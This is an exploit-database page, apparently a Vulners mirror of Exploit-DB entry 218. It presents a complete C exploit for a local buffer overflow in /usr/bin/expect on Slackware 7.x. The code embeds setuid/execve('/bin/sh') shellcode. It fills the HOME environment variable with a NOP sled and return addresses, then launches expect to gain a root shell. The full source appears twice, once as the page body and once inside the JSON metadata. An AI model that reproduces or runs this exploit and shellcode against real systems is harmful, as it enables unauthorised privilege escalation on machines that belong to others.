Search...

expect /usr/bin/expect Buffer Overflow

2000-12-04T00:00:00

ID EDB-ID:218
Type exploitdb
Reporter isox
Modified 2000-12-04T00:00:00

Description

expect (/usr/bin/expect) buffer overflow. Local exploit for linux platform

                                        
                                            /* hhp-expect_smash.c (12/11/00)
 *
 * expect (/usr/bin/expect) buffer overflow.
 * Tested 5.31.8 and 5.28.1, slackware 7.x (Maybe others).
 *
 * By: isox
 * Site: www.hhp-programming.net
 * Advisory: www.hhp-programming.net/ouradvisories/hhp-expect_adv%2317.txt
 */

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;

#define NOP				0x90
#define OFFSET			0
#define BUFLEN			416
#define RET				0xbffff580			/* Slackware 7.1 */
#define EXPECT			"/usr/bin/expect"

char code[] =
 "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x66\x31\xc0\x66\x31"
 "\xdb\xb0\x2e\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
 "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
 "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
 "\xdc\xff\xff\xff/bin/sh\x69";

void usage(char *arg) {
  fprintf(stderr, "\nUsage: %s [offset up/down] [eip]\n\n", arg);
  fprintf(stderr, "Examples:\n");
  fprintf(stderr, "\t%s 347 up                 -=- Default EIP increased by 347 bytes\n", arg);
  fprintf(stderr, "\t%s 347 down               -=- Default EIP decreased by 347 bytes\n", arg);
  fprintf(stderr, "\t%s 429 up 0x%lx      -=- EIP set to 0x%lx and increased by 429 bytes\n", arg, RET, RET + 429);
  fprintf(stderr, "\t%s 429 down 0x%lx    -=- EIP set to 0x%lx and decreased by 429 bytes\n\n", arg, RET, RET - 429);
  exit(1);
}


int main(int argc, char *argv[]) {
  char *buf, *p;
  long *addressp, address;
  int offset=OFFSET;
  int i;


  if((argc &lt; 3) || (argc &gt; 4))
    usage(argv[0]);

  if(argc == 3) {
    if(!strcmp(argv[2], "up")) {
      address = RET + atoi(argv[1]);
      printf("Increasing offset by: %d\n", atoi(argv[1]));
      printf("Increasing EIP to: 0x%x\n\n", RET + atoi(argv[1]));
    }

    if(!strcmp(argv[2], "down")) {
      address = RET - atoi(argv[1]);
      printf("Decreasing offset by: %d\n", atoi(argv[1]));
      printf("Decreasing EIP to: 0x%x\n\n", RET - atoi(argv[1]));
    }
  }

  if(argc &gt;= 4) {
    if(!strcmp(argv[2], "up")) {
      address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
      printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16));
      printf("Increasing offset by: %d\n", atoi(argv[1]));
      printf("Increasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) + atoi(argv[1])));
    }
    if(!strcmp(argv[2], "down")) {
      address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
      printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16));
      printf("Decreasing offset by: %d\n", atoi(argv[1]));
      printf("Decreasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) - atoi(argv[1])));
    }
  }


  if (!(buf = (char *)malloc(BUFLEN))) {
    printf("Can't allocate memory.\n");
    exit(-1);
  }

  p = buf;
  addressp = (long *) p;

  for (i = 0; i &lt; BUFLEN; i+=4) {
    *(addressp++) = address;
  }

  for (i = 0; i &lt; (BUFLEN - strlen(code) - 4); i++) {
    buf[i] = NOP;
  }

  p = buf + (BUFLEN - strlen(code) - 4);

  for (i = 0; i &lt; strlen(code); i++)
    *(p++) = code[i];

  buf[BUFLEN] = '\0';


  setenv("HOME", buf, 1);
  system(EXPECT);
}


// milw0rm.com [2000-12-04]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:218", "hash": "2619f93edbc81bc50f3995bf2ca8ff60", "type": "exploitdb", "bulletinFamily": "exploit", "title": "expect /usr/bin/expect Buffer Overflow", "description": "expect (/usr/bin/expect) buffer overflow. Local exploit for linux platform", "published": "2000-12-04T00:00:00", "modified": "2000-12-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/218/", "reporter": "isox", "references": [], "cvelist": [], "lastseen": "2016-01-31T11:57:27", "history": [], "viewCount": 3, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2016-01-31T11:57:27"}, "dependencies": {"references": [], "modified": "2016-01-31T11:57:27"}, "vulnersScore": -0.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/218/", "sourceData": "/* hhp-expect_smash.c (12/11/00)\r\n *\r\n * expect (/usr/bin/expect) buffer overflow.\r\n * Tested 5.31.8 and 5.28.1, slackware 7.x (Maybe others).\r\n *\r\n * By: isox\r\n * Site: www.hhp-programming.net\r\n * Advisory: www.hhp-programming.net/ouradvisories/hhp-expect_adv%2317.txt\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\n#define NOP\t\t\t\t0x90\r\n#define OFFSET\t\t\t0\r\n#define BUFLEN\t\t\t416\r\n#define RET\t\t\t\t0xbffff580\t\t\t/* Slackware 7.1 */\r\n#define EXPECT\t\t\t\"/usr/bin/expect\"\r\n\r\nchar code[] =\r\n \"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x66\\x31\\xc0\\x66\\x31\"\r\n \"\\xdb\\xb0\\x2e\\xcd\\x80\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\"\r\n \"\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\"\r\n \"\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\"\r\n \"\\xdc\\xff\\xff\\xff/bin/sh\\x69\";\r\n\r\nvoid usage(char *arg) {\r\n fprintf(stderr, \"\\nUsage: %s [offset up/down] [eip]\\n\\n\", arg);\r\n fprintf(stderr, \"Examples:\\n\");\r\n fprintf(stderr, \"\\t%s 347 up -=- Default EIP increased by 347 bytes\\n\", arg);\r\n fprintf(stderr, \"\\t%s 347 down -=- Default EIP decreased by 347 bytes\\n\", arg);\r\n fprintf(stderr, \"\\t%s 429 up 0x%lx -=- EIP set to 0x%lx and increased by 429 bytes\\n\", arg, RET, RET + 429);\r\n fprintf(stderr, \"\\t%s 429 down 0x%lx -=- EIP set to 0x%lx and decreased by 429 bytes\\n\\n\", arg, RET, RET - 429);\r\n exit(1);\r\n}\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n char *buf, *p;\r\n long *addressp, address;\r\n int offset=OFFSET;\r\n int i;\r\n\r\n\r\n if((argc < 3) || (argc > 4))\r\n usage(argv[0]);\r\n\r\n if(argc == 3) {\r\n if(!strcmp(argv[2], \"up\")) {\r\n address = RET + atoi(argv[1]);\r\n printf(\"Increasing offset by: %d\\n\", atoi(argv[1]));\r\n printf(\"Increasing EIP to: 0x%x\\n\\n\", RET + atoi(argv[1]));\r\n }\r\n\r\n if(!strcmp(argv[2], \"down\")) {\r\n address = RET - atoi(argv[1]);\r\n printf(\"Decreasing offset by: %d\\n\", atoi(argv[1]));\r\n printf(\"Decreasing EIP to: 0x%x\\n\\n\", RET - atoi(argv[1]));\r\n }\r\n }\r\n\r\n if(argc >= 4) {\r\n if(!strcmp(argv[2], \"up\")) {\r\n address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);\r\n printf(\"Setting EIP to: 0x%x\\n\", strtoul(argv[3], NULL, 16));\r\n printf(\"Increasing offset by: %d\\n\", atoi(argv[1]));\r\n printf(\"Increasing EIP to: 0x%x\\n\\n\", (strtoul(argv[3], NULL, 16) + atoi(argv[1])));\r\n }\r\n if(!strcmp(argv[2], \"down\")) {\r\n address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);\r\n printf(\"Setting EIP to: 0x%x\\n\", strtoul(argv[3], NULL, 16));\r\n printf(\"Decreasing offset by: %d\\n\", atoi(argv[1]));\r\n printf(\"Decreasing EIP to: 0x%x\\n\\n\", (strtoul(argv[3], NULL, 16) - atoi(argv[1])));\r\n }\r\n }\r\n\r\n\r\n if (!(buf = (char *)malloc(BUFLEN))) {\r\n printf(\"Can't allocate memory.\\n\");\r\n exit(-1);\r\n }\r\n\r\n p = buf;\r\n addressp = (long *) p;\r\n\r\n for (i = 0; i < BUFLEN; i+=4) {\r\n *(addressp++) = address;\r\n }\r\n\r\n for (i = 0; i < (BUFLEN - strlen(code) - 4); i++) {\r\n buf[i] = NOP;\r\n }\r\n\r\n p = buf + (BUFLEN - strlen(code) - 4);\r\n\r\n for (i = 0; i < strlen(code); i++)\r\n *(p++) = code[i];\r\n\r\n buf[BUFLEN] = '\\0';\r\n\r\n\r\n setenv(\"HOME\", buf, 1);\r\n system(EXPECT);\r\n}\r\n\n\n// milw0rm.com [2000-12-04]\n", "osvdbidlist": ["60979"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}